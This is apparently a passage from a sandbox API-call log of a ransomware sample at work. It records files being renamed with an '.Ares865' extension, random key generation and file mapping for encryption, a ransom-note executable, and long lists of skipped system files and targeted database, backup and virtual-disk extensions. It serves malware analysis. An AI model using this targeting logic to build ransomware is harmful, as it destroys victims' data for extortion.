[0085.965] lstrcmpiW (lpString1="dll", lpString2="xdb") returned -1 [0085.965] lstrlenW (lpString="xld") returned 3 [0085.965] lstrcmpiW (lpString1="dll", lpString2="xld") returned -1 [0085.965] lstrlenW (lpString="xmlff") returned 5 [0085.966] lstrcmpiW (lpString1="x_dll", lpString2="xmlff") returned -1 [0085.966] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\GRINTL32.REST.trx_dll.Ares865") returned 81 [0085.966] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\GRINTL32.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\grintl32.rest.trx_dll"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\GRINTL32.REST.trx_dll.Ares865" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\grintl32.rest.trx_dll.ares865"), dwFlags=0x1) returned 1 [0085.967] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\GRINTL32.REST.trx_dll.Ares865" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\grintl32.rest.trx_dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0085.967] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=235872) returned 1 [0085.967] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0085.967] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0085.967] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0085.968] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0085.968] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0085.968] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0085.968] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x39c60, lpName=0x0) returned 0x15c [0085.970] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x39c60) returned 0x420000 [0085.982] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0085.982] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0085.982] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0085.983] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0085.983] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0085.983] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0085.983] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0085.983] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0085.983] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0085.983] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0085.983] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0085.983] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0085.983] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0085.983] UnmapViewOfFile (lpBaseAddress=0x420000) returned 1 [0085.985] CloseHandle (hObject=0x15c) returned 1 [0085.985] CloseHandle (hObject=0x118) returned 1 [0085.985] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0085.985] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0085.985] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0085.986] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c5e97a0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c5e97a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0085.987] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0085.987] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x302da400, ftCreationTime.dwHighDateTime=0x1caca12, ftLastAccessTime.dwLowDateTime=0xeee1cd90, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x302da400, ftLastWriteTime.dwHighDateTime=0x1caca12, nFileSizeHigh=0x0, nFileSizeLow=0x47d60, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MAPIR.DLL.trx_dll", cAlternateFileName="MAPIRD~1.TRX")) returned 1 [0085.987] lstrcmpiW (lpString1="MAPIR.DLL.trx_dll", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0085.987] lstrcmpiW (lpString1="MAPIR.DLL.trx_dll", lpString2="aoldtz.exe") returned 1 [0085.987] lstrcmpiW (lpString1="MAPIR.DLL.trx_dll", lpString2=".") returned 1 [0085.987] lstrcmpiW (lpString1="MAPIR.DLL.trx_dll", lpString2="..") returned 1 [0085.987] lstrcmpiW (lpString1="MAPIR.DLL.trx_dll", lpString2="windows") returned -1 [0085.987] lstrcmpiW (lpString1="MAPIR.DLL.trx_dll", lpString2="bootmgr") returned 1 [0085.987] lstrcmpiW (lpString1="MAPIR.DLL.trx_dll", lpString2="temp") returned -1 [0085.987] lstrcmpiW (lpString1="MAPIR.DLL.trx_dll", lpString2="pagefile.sys") returned -1 [0085.987] lstrcmpiW (lpString1="MAPIR.DLL.trx_dll", lpString2="boot") returned 1 [0085.987] lstrcmpiW (lpString1="MAPIR.DLL.trx_dll", lpString2="ids.txt") returned 1 [0085.987] lstrcmpiW (lpString1="MAPIR.DLL.trx_dll", lpString2="ntuser.dat") returned -1 [0085.987] lstrcmpiW (lpString1="MAPIR.DLL.trx_dll", lpString2="perflogs") returned -1 [0085.987] lstrcmpiW (lpString1="MAPIR.DLL.trx_dll", lpString2="MSBuild") returned -1 [0085.987] lstrlenW (lpString="MAPIR.DLL.trx_dll") returned 17 [0085.987] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\GRINTL32.REST.trx_dll") returned 73 [0085.987] lstrcpyW (in: lpString1=0x2cce468, lpString2="MAPIR.DLL.trx_dll" | out: lpString1="MAPIR.DLL.trx_dll") returned="MAPIR.DLL.trx_dll" [0085.987] lstrlenW (lpString="MAPIR.DLL.trx_dll") returned 17 [0085.987] lstrlenW (lpString="Ares865") returned 7 [0085.987] lstrcmpiW (lpString1="trx_dll", lpString2="Ares865") returned 1 [0085.987] lstrlenW (lpString=".dll") returned 4 [0085.987] lstrcmpiW (lpString1="MAPIR.DLL.trx_dll", lpString2=".dll") returned 1 [0085.987] lstrlenW (lpString=".lnk") returned 4 [0085.987] lstrcmpiW (lpString1="MAPIR.DLL.trx_dll", lpString2=".lnk") returned 1 [0085.987] lstrlenW (lpString=".ini") returned 4 [0085.987] lstrcmpiW (lpString1="MAPIR.DLL.trx_dll", lpString2=".ini") returned 1 [0085.987] lstrlenW (lpString=".sys") returned 4 [0085.987] lstrcmpiW (lpString1="MAPIR.DLL.trx_dll", lpString2=".sys") returned 1 [0085.987] lstrlenW (lpString="MAPIR.DLL.trx_dll") returned 17 [0085.987] lstrlenW (lpString="bak") returned 3 [0085.987] lstrcmpiW (lpString1="dll", lpString2="bak") returned 1 [0085.987] lstrlenW (lpString="ba_") returned 3 [0085.987] lstrcmpiW (lpString1="dll", lpString2="ba_") returned 1 [0085.987] lstrlenW (lpString="dbb") returned 3 [0085.988] lstrcmpiW (lpString1="dll", lpString2="dbb") returned 1 [0085.988] lstrlenW (lpString="vmdk") returned 4 [0085.988] lstrcmpiW (lpString1="_dll", lpString2="vmdk") returned -1 [0085.988] lstrlenW (lpString="rar") returned 3 [0085.988] lstrcmpiW (lpString1="dll", lpString2="rar") returned -1 [0085.988] lstrlenW (lpString="zip") returned 3 [0085.988] lstrcmpiW (lpString1="dll", lpString2="zip") returned -1 [0085.988] lstrlenW (lpString="tgz") returned 3 [0085.988] lstrcmpiW (lpString1="dll", lpString2="tgz") returned -1 [0085.988] lstrlenW (lpString="vbox") returned 4 [0085.988] lstrcmpiW (lpString1="_dll", lpString2="vbox") returned -1 [0085.988] lstrlenW (lpString="vdi") returned 3 [0085.988] lstrcmpiW (lpString1="dll", lpString2="vdi") returned -1 [0085.988] lstrlenW (lpString="vhd") returned 3 [0085.988] lstrcmpiW (lpString1="dll", lpString2="vhd") returned -1 [0085.988] lstrlenW (lpString="vhdx") returned 4 [0085.988] lstrcmpiW (lpString1="_dll", lpString2="vhdx") returned -1 [0085.988] lstrlenW (lpString="avhd") returned 4 [0085.988] lstrcmpiW (lpString1="_dll", lpString2="avhd") returned -1 [0085.988] lstrlenW (lpString="db") returned 2 [0085.988] lstrcmpiW (lpString1="ll", lpString2="db") returned 1 [0085.988] lstrlenW (lpString="db2") returned 3 [0085.988] lstrcmpiW (lpString1="dll", lpString2="db2") returned 1 [0085.988] lstrlenW (lpString="db3") returned 3 [0085.988] lstrcmpiW (lpString1="dll", lpString2="db3") returned 1 [0085.988] lstrlenW (lpString="dbf") returned 3 [0085.988] lstrcmpiW (lpString1="dll", lpString2="dbf") returned 1 [0085.988] lstrlenW (lpString="mdf") returned 3 [0085.988] lstrcmpiW (lpString1="dll", lpString2="mdf") returned -1 [0085.988] lstrlenW (lpString="mdb") returned 3 [0085.988] lstrcmpiW (lpString1="dll", lpString2="mdb") returned -1 [0085.988] lstrlenW (lpString="sql") returned 3 [0085.988] lstrcmpiW (lpString1="dll", lpString2="sql") returned -1 [0085.988] lstrlenW (lpString="sqlite") returned 6 [0085.988] lstrcmpiW (lpString1="rx_dll", lpString2="sqlite") returned -1 [0085.988] lstrlenW (lpString="sqlite3") returned 7 [0085.988] lstrcmpiW (lpString1="trx_dll", lpString2="sqlite3") returned 1 [0085.988] lstrlenW (lpString="sqlitedb") returned 8 [0085.989] lstrcmpiW (lpString1=".trx_dll", lpString2="sqlitedb") returned -1 [0085.989] lstrlenW (lpString="xml") returned 3 [0085.989] lstrcmpiW (lpString1="dll", lpString2="xml") returned -1 [0085.989] lstrlenW (lpString="$er") returned 3 [0085.989] lstrcmpiW (lpString1="dll", lpString2="$er") returned 1 [0085.989] lstrlenW (lpString="4dd") returned 3 [0085.989] lstrcmpiW (lpString1="dll", lpString2="4dd") returned 1 [0085.989] lstrlenW (lpString="4dl") returned 3 [0085.989] lstrcmpiW (lpString1="dll", lpString2="4dl") returned 1 [0085.989] lstrlenW (lpString="^^^") returned 3 [0085.989] lstrcmpiW (lpString1="dll", lpString2="^^^") returned 1 [0085.989] lstrlenW (lpString="abs") returned 3 [0085.989] lstrcmpiW (lpString1="dll", lpString2="abs") returned 1 [0085.989] lstrlenW (lpString="abx") returned 3 [0085.989] lstrcmpiW (lpString1="dll", lpString2="abx") returned 1 [0085.989] lstrlenW (lpString="accdb") returned 5 [0085.989] lstrcmpiW (lpString1="x_dll", lpString2="accdb") returned 1 [0085.989] lstrlenW (lpString="accdc") returned 5 [0085.989] lstrcmpiW (lpString1="x_dll", lpString2="accdc") returned 1 [0085.989] lstrlenW (lpString="accde") returned 5 [0085.989] lstrcmpiW (lpString1="x_dll", lpString2="accde") returned 1 [0085.989] lstrlenW (lpString="accdr") returned 5 [0085.989] lstrcmpiW (lpString1="x_dll", lpString2="accdr") returned 1 [0085.989] lstrlenW (lpString="accdt") returned 5 [0085.989] lstrcmpiW (lpString1="x_dll", lpString2="accdt") returned 1 [0085.989] lstrlenW (lpString="accdw") returned 5 [0085.989] lstrcmpiW (lpString1="x_dll", lpString2="accdw") returned 1 [0085.989] lstrlenW (lpString="accft") returned 5 [0085.989] lstrcmpiW (lpString1="x_dll", lpString2="accft") returned 1 [0085.989] lstrlenW (lpString="adb") returned 3 [0085.989] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0085.989] lstrlenW (lpString="adb") returned 3 [0085.989] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0085.989] lstrlenW (lpString="ade") returned 3 [0085.989] lstrcmpiW (lpString1="dll", lpString2="ade") returned 1 [0085.989] lstrlenW (lpString="adf") returned 3 [0085.989] lstrcmpiW (lpString1="dll", lpString2="adf") returned 1 [0085.989] lstrlenW (lpString="adn") returned 3 [0085.990] lstrcmpiW (lpString1="dll", lpString2="adn") returned 1 [0085.990] lstrlenW (lpString="adp") returned 3 [0085.990] lstrcmpiW (lpString1="dll", lpString2="adp") returned 1 [0085.990] lstrlenW (lpString="alf") returned 3 [0085.990] lstrcmpiW (lpString1="dll", lpString2="alf") returned 1 [0085.990] lstrlenW (lpString="ask") returned 3 [0085.990] lstrcmpiW (lpString1="dll", lpString2="ask") returned 1 [0085.990] lstrlenW (lpString="btr") returned 3 [0085.990] lstrcmpiW (lpString1="dll", lpString2="btr") returned 1 [0085.990] lstrlenW (lpString="cat") returned 3 [0085.990] lstrcmpiW (lpString1="dll", lpString2="cat") returned 1 [0085.990] lstrlenW (lpString="cdb") returned 3 [0085.990] lstrcmpiW (lpString1="dll", lpString2="cdb") returned 1 [0085.990] lstrlenW (lpString="ckp") returned 3 [0085.990] lstrcmpiW (lpString1="dll", lpString2="ckp") returned 1 [0085.990] lstrlenW (lpString="cma") returned 3 [0085.990] lstrcmpiW (lpString1="dll", lpString2="cma") returned 1 [0085.990] lstrlenW (lpString="cpd") returned 3 [0085.990] lstrcmpiW (lpString1="dll", lpString2="cpd") returned 1 [0085.990] lstrlenW (lpString="dacpac") returned 6 [0085.990] lstrcmpiW (lpString1="rx_dll", lpString2="dacpac") returned 1 [0085.990] lstrlenW (lpString="dad") returned 3 [0085.990] lstrcmpiW (lpString1="dll", lpString2="dad") returned 1 [0085.990] lstrlenW (lpString="dadiagrams") returned 10 [0085.990] lstrcmpiW (lpString1="LL.trx_dll", lpString2="dadiagrams") returned 1 [0085.990] lstrlenW (lpString="daschema") returned 8 [0085.990] lstrcmpiW (lpString1=".trx_dll", lpString2="daschema") returned -1 [0085.990] lstrlenW (lpString="db-journal") returned 10 [0085.990] lstrcmpiW (lpString1="LL.trx_dll", lpString2="db-journal") returned 1 [0085.990] lstrlenW (lpString="db-shm") returned 6 [0085.990] lstrcmpiW (lpString1="rx_dll", lpString2="db-shm") returned 1 [0085.990] lstrlenW (lpString="db-wal") returned 6 [0085.990] lstrcmpiW (lpString1="rx_dll", lpString2="db-wal") returned 1 [0085.990] lstrlenW (lpString="dbc") returned 3 [0085.990] lstrcmpiW (lpString1="dll", lpString2="dbc") returned 1 [0085.990] lstrlenW (lpString="dbs") returned 3 [0085.990] lstrcmpiW (lpString1="dll", lpString2="dbs") returned 1 [0085.990] lstrlenW (lpString="dbt") returned 3 [0085.991] lstrcmpiW (lpString1="dll", lpString2="dbt") returned 1 [0085.991] lstrlenW (lpString="dbv") returned 3 [0085.991] lstrcmpiW (lpString1="dll", lpString2="dbv") returned 1 [0085.991] lstrlenW (lpString="dbx") returned 3 [0085.991] lstrcmpiW (lpString1="dll", lpString2="dbx") returned 1 [0085.991] lstrlenW (lpString="dcb") returned 3 [0085.991] lstrcmpiW (lpString1="dll", lpString2="dcb") returned 1 [0085.991] lstrlenW (lpString="dct") returned 3 [0085.991] lstrcmpiW (lpString1="dll", lpString2="dct") returned 1 [0085.991] lstrlenW (lpString="dcx") returned 3 [0085.991] lstrcmpiW (lpString1="dll", lpString2="dcx") returned 1 [0085.991] lstrlenW (lpString="ddl") returned 3 [0085.991] lstrcmpiW (lpString1="dll", lpString2="ddl") returned 1 [0085.991] lstrlenW (lpString="dlis") returned 4 [0085.991] lstrcmpiW (lpString1="_dll", lpString2="dlis") returned -1 [0085.991] lstrlenW (lpString="dp1") returned 3 [0085.991] lstrcmpiW (lpString1="dll", lpString2="dp1") returned -1 [0085.991] lstrlenW (lpString="dqy") returned 3 [0085.991] lstrcmpiW (lpString1="dll", lpString2="dqy") returned -1 [0085.991] lstrlenW (lpString="dsk") returned 3 [0085.991] lstrcmpiW (lpString1="dll", lpString2="dsk") returned -1 [0085.991] lstrlenW (lpString="dsn") returned 3 [0085.991] lstrcmpiW (lpString1="dll", lpString2="dsn") returned -1 [0085.991] lstrlenW (lpString="dtsx") returned 4 [0085.991] lstrcmpiW (lpString1="_dll", lpString2="dtsx") returned -1 [0085.991] lstrlenW (lpString="dxl") returned 3 [0085.991] lstrcmpiW (lpString1="dll", lpString2="dxl") returned -1 [0085.991] lstrlenW (lpString="eco") returned 3 [0085.991] lstrcmpiW (lpString1="dll", lpString2="eco") returned -1 [0085.991] lstrlenW (lpString="ecx") returned 3 [0085.991] lstrcmpiW (lpString1="dll", lpString2="ecx") returned -1 [0085.991] lstrlenW (lpString="edb") returned 3 [0085.991] lstrcmpiW (lpString1="dll", lpString2="edb") returned -1 [0085.991] lstrlenW (lpString="epim") returned 4 [0085.991] lstrcmpiW (lpString1="_dll", lpString2="epim") returned -1 [0085.991] lstrlenW (lpString="fcd") returned 3 [0085.991] lstrcmpiW (lpString1="dll", lpString2="fcd") returned -1 [0085.991] lstrlenW (lpString="fdb") returned 3 [0085.992] lstrcmpiW (lpString1="dll", lpString2="fdb") returned -1 [0085.992] lstrlenW (lpString="fic") returned 3 [0085.992] lstrcmpiW (lpString1="dll", lpString2="fic") returned -1 [0085.992] lstrlenW (lpString="flexolibrary") returned 12 [0085.992] lstrcmpiW (lpString1=".DLL.trx_dll", lpString2="flexolibrary") returned -1 [0085.992] lstrlenW (lpString="fm5") returned 3 [0085.992] lstrcmpiW (lpString1="dll", lpString2="fm5") returned -1 [0085.992] lstrlenW (lpString="fmp") returned 3 [0085.992] lstrcmpiW (lpString1="dll", lpString2="fmp") returned -1 [0085.992] lstrlenW (lpString="fmp12") returned 5 [0085.992] lstrcmpiW (lpString1="x_dll", lpString2="fmp12") returned 1 [0085.992] lstrlenW (lpString="fmpsl") returned 5 [0085.992] lstrcmpiW (lpString1="x_dll", lpString2="fmpsl") returned 1 [0085.992] lstrlenW (lpString="fol") returned 3 [0085.992] lstrcmpiW (lpString1="dll", lpString2="fol") returned -1 [0085.992] lstrlenW (lpString="fp3") returned 3 [0085.992] lstrcmpiW (lpString1="dll", lpString2="fp3") returned -1 [0085.992] lstrlenW (lpString="fp4") returned 3 [0085.992] lstrcmpiW (lpString1="dll", lpString2="fp4") returned -1 [0085.992] lstrlenW (lpString="fp5") returned 3 [0085.992] lstrcmpiW (lpString1="dll", lpString2="fp5") returned -1 [0085.992] lstrlenW (lpString="fp7") returned 3 [0085.992] lstrcmpiW (lpString1="dll", lpString2="fp7") returned -1 [0085.992] lstrlenW (lpString="fpt") returned 3 [0085.992] lstrcmpiW (lpString1="dll", lpString2="fpt") returned -1 [0085.992] lstrlenW (lpString="frm") returned 3 [0085.992] lstrcmpiW (lpString1="dll", lpString2="frm") returned -1 [0085.992] lstrlenW (lpString="gdb") returned 3 [0085.992] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0085.992] lstrlenW (lpString="gdb") returned 3 [0085.992] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0085.992] lstrlenW (lpString="grdb") returned 4 [0085.992] lstrcmpiW (lpString1="_dll", lpString2="grdb") returned -1 [0085.992] lstrlenW (lpString="gwi") returned 3 [0085.992] lstrcmpiW (lpString1="dll", lpString2="gwi") returned -1 [0085.992] lstrlenW (lpString="hdb") returned 3 [0085.992] lstrcmpiW (lpString1="dll", lpString2="hdb") returned -1 [0085.992] lstrlenW (lpString="his") returned 3 [0085.993] lstrcmpiW (lpString1="dll", lpString2="his") returned -1 [0085.993] lstrlenW (lpString="ib") returned 2 [0085.993] lstrcmpiW (lpString1="ll", lpString2="ib") returned 1 [0085.993] lstrlenW (lpString="idb") returned 3 [0085.993] lstrcmpiW (lpString1="dll", lpString2="idb") returned -1 [0085.993] lstrlenW (lpString="ihx") returned 3 [0085.993] lstrcmpiW (lpString1="dll", lpString2="ihx") returned -1 [0085.993] lstrlenW (lpString="itdb") returned 4 [0085.993] lstrcmpiW (lpString1="_dll", lpString2="itdb") returned -1 [0085.993] lstrlenW (lpString="itw") returned 3 [0085.993] lstrcmpiW (lpString1="dll", lpString2="itw") returned -1 [0085.993] lstrlenW (lpString="jet") returned 3 [0085.993] lstrcmpiW (lpString1="dll", lpString2="jet") returned -1 [0085.993] lstrlenW (lpString="jtx") returned 3 [0085.993] lstrcmpiW (lpString1="dll", lpString2="jtx") returned -1 [0085.993] lstrlenW (lpString="kdb") returned 3 [0085.993] lstrcmpiW (lpString1="dll", lpString2="kdb") returned -1 [0085.993] lstrlenW (lpString="kexi") returned 4 [0085.993] lstrcmpiW (lpString1="_dll", lpString2="kexi") returned -1 [0085.993] lstrlenW (lpString="kexic") returned 5 [0085.993] lstrcmpiW (lpString1="x_dll", lpString2="kexic") returned 1 [0085.993] lstrlenW (lpString="kexis") returned 5 [0085.993] lstrcmpiW (lpString1="x_dll", lpString2="kexis") returned 1 [0085.993] lstrlenW (lpString="lgc") returned 3 [0085.993] lstrcmpiW (lpString1="dll", lpString2="lgc") returned -1 [0085.993] lstrlenW (lpString="lwx") returned 3 [0085.993] lstrcmpiW (lpString1="dll", lpString2="lwx") returned -1 [0085.993] lstrlenW (lpString="maf") returned 3 [0085.993] lstrcmpiW (lpString1="dll", lpString2="maf") returned -1 [0085.993] lstrlenW (lpString="maq") returned 3 [0085.993] lstrcmpiW (lpString1="dll", lpString2="maq") returned -1 [0085.993] lstrlenW (lpString="mar") returned 3 [0085.993] lstrcmpiW (lpString1="dll", lpString2="mar") returned -1 [0085.993] lstrlenW (lpString="marshal") returned 7 [0085.993] lstrcmpiW (lpString1="trx_dll", lpString2="marshal") returned 1 [0085.993] lstrlenW (lpString="mas") returned 3 [0085.993] lstrcmpiW (lpString1="dll", lpString2="mas") returned -1 [0085.993] lstrlenW (lpString="mav") returned 3 [0085.994] lstrcmpiW (lpString1="dll", lpString2="mav") returned -1 [0085.994] lstrlenW (lpString="maw") returned 3 [0085.994] lstrcmpiW (lpString1="dll", lpString2="maw") returned -1 [0085.994] lstrlenW (lpString="mdbhtml") returned 7 [0085.994] lstrcmpiW (lpString1="trx_dll", lpString2="mdbhtml") returned 1 [0085.994] lstrlenW (lpString="mdn") returned 3 [0085.994] lstrcmpiW (lpString1="dll", lpString2="mdn") returned -1 [0085.994] lstrlenW (lpString="mdt") returned 3 [0085.994] lstrcmpiW (lpString1="dll", lpString2="mdt") returned -1 [0085.994] lstrlenW (lpString="mfd") returned 3 [0085.994] lstrcmpiW (lpString1="dll", lpString2="mfd") returned -1 [0085.994] lstrlenW (lpString="mpd") returned 3 [0085.994] lstrcmpiW (lpString1="dll", lpString2="mpd") returned -1 [0085.994] lstrlenW (lpString="mrg") returned 3 [0085.994] lstrcmpiW (lpString1="dll", lpString2="mrg") returned -1 [0085.994] lstrlenW (lpString="mud") returned 3 [0085.994] lstrcmpiW (lpString1="dll", lpString2="mud") returned -1 [0085.994] lstrlenW (lpString="mwb") returned 3 [0085.994] lstrcmpiW (lpString1="dll", lpString2="mwb") returned -1 [0085.994] lstrlenW (lpString="myd") returned 3 [0085.994] lstrcmpiW (lpString1="dll", lpString2="myd") returned -1 [0085.994] lstrlenW (lpString="ndf") returned 3 [0085.994] lstrcmpiW (lpString1="dll", lpString2="ndf") returned -1 [0085.994] lstrlenW (lpString="nnt") returned 3 [0085.994] lstrcmpiW (lpString1="dll", lpString2="nnt") returned -1 [0085.994] lstrlenW (lpString="nrmlib") returned 6 [0085.994] lstrcmpiW (lpString1="rx_dll", lpString2="nrmlib") returned 1 [0085.994] lstrlenW (lpString="ns2") returned 3 [0085.994] lstrcmpiW (lpString1="dll", lpString2="ns2") returned -1 [0085.994] lstrlenW (lpString="ns3") returned 3 [0085.994] lstrcmpiW (lpString1="dll", lpString2="ns3") returned -1 [0085.994] lstrlenW (lpString="ns4") returned 3 [0085.994] lstrcmpiW (lpString1="dll", lpString2="ns4") returned -1 [0085.994] lstrlenW (lpString="nsf") returned 3 [0085.994] lstrcmpiW (lpString1="dll", lpString2="nsf") returned -1 [0085.994] lstrlenW (lpString="nv") returned 2 [0085.994] lstrcmpiW (lpString1="ll", lpString2="nv") returned -1 [0085.995] lstrlenW (lpString="nv2") returned 3 [0085.995] lstrcmpiW (lpString1="dll", lpString2="nv2") returned -1 [0085.995] lstrlenW (lpString="nwdb") returned 4 [0085.995] lstrcmpiW (lpString1="_dll", lpString2="nwdb") returned -1 [0085.995] lstrlenW (lpString="nyf") returned 3 [0085.995] lstrcmpiW (lpString1="dll", lpString2="nyf") returned -1 [0085.995] lstrlenW (lpString="odb") returned 3 [0085.995] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 [0085.995] lstrlenW (lpString="odb") returned 3 [0085.995] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 [0085.995] lstrlenW (lpString="oqy") returned 3 [0085.995] lstrcmpiW (lpString1="dll", lpString2="oqy") returned -1 [0085.995] lstrlenW (lpString="ora") returned 3 [0085.995] lstrcmpiW (lpString1="dll", lpString2="ora") returned -1 [0085.995] lstrlenW (lpString="orx") returned 3 [0085.995] lstrcmpiW (lpString1="dll", lpString2="orx") returned -1 [0085.995] lstrlenW (lpString="owc") returned 3 [0085.995] lstrcmpiW (lpString1="dll", lpString2="owc") returned -1 [0085.995] lstrlenW (lpString="p96") returned 3 [0085.995] lstrcmpiW (lpString1="dll", lpString2="p96") returned -1 [0085.995] lstrlenW (lpString="p97") returned 3 [0085.995] lstrcmpiW (lpString1="dll", lpString2="p97") returned -1 [0085.995] lstrlenW (lpString="pan") returned 3 [0085.995] lstrcmpiW (lpString1="dll", lpString2="pan") returned -1 [0085.995] lstrlenW (lpString="pdb") returned 3 [0085.995] lstrcmpiW (lpString1="dll", lpString2="pdb") returned -1 [0085.995] lstrlenW (lpString="pdm") returned 3 [0085.995] lstrcmpiW (lpString1="dll", lpString2="pdm") returned -1 [0085.995] lstrlenW (lpString="pnz") returned 3 [0085.995] lstrcmpiW (lpString1="dll", lpString2="pnz") returned -1 [0085.995] lstrlenW (lpString="qry") returned 3 [0085.995] lstrcmpiW (lpString1="dll", lpString2="qry") returned -1 [0085.995] lstrlenW (lpString="qvd") returned 3 [0085.995] lstrcmpiW (lpString1="dll", lpString2="qvd") returned -1 [0085.995] lstrlenW (lpString="rbf") returned 3 [0085.995] lstrcmpiW (lpString1="dll", lpString2="rbf") returned -1 [0085.995] lstrlenW (lpString="rctd") returned 4 [0085.995] lstrcmpiW (lpString1="_dll", lpString2="rctd") returned -1 [0085.995] lstrlenW (lpString="rod") returned 3 [0085.996] lstrcmpiW (lpString1="dll", lpString2="rod") returned -1 [0085.996] lstrlenW (lpString="rodx") returned 4 [0085.996] lstrcmpiW (lpString1="_dll", lpString2="rodx") returned -1 [0085.996] lstrlenW (lpString="rpd") returned 3 [0085.996] lstrcmpiW (lpString1="dll", lpString2="rpd") returned -1 [0085.996] lstrlenW (lpString="rsd") returned 3 [0085.996] lstrcmpiW (lpString1="dll", lpString2="rsd") returned -1 [0085.996] lstrlenW (lpString="sas7bdat") returned 8 [0085.996] lstrcmpiW (lpString1=".trx_dll", lpString2="sas7bdat") returned -1 [0085.996] lstrlenW (lpString="sbf") returned 3 [0085.996] lstrcmpiW (lpString1="dll", lpString2="sbf") returned -1 [0085.996] lstrlenW (lpString="scx") returned 3 [0085.996] lstrcmpiW (lpString1="dll", lpString2="scx") returned -1 [0085.996] lstrlenW (lpString="sdb") returned 3 [0085.996] lstrcmpiW (lpString1="dll", lpString2="sdb") returned -1 [0085.996] lstrlenW (lpString="sdc") returned 3 [0085.996] lstrcmpiW (lpString1="dll", lpString2="sdc") returned -1 [0085.996] lstrlenW (lpString="sdf") returned 3 [0085.996] 